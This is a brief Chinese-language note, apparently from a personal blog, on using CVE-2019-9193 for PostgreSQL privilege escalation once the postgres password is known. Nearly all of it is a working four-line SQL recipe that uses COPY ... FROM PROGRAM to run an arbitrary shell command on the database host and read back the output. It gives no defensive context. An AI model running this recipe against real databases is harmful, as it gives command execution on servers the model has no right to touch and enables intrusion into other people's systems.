前言
利用CVE-2019-9193漏洞实现PostgreSQL提权
漏洞利用前提
- 已经获取了PostgreSQL的postgres用户密码
漏洞利用
- 通过PostgreSQL执行Shell命令,并将Shell命令执行结果保存在指定数据表中,查询该表查看Shell命令执行结果
<shell>:Shell命令
1
2
3
4
| DROP TABLE IF EXISTS x;
CREATE TABLE x(cmd_output text);
COPY x FROM PROGRAM '<shell>';
SELECT * FROM x;
|
完成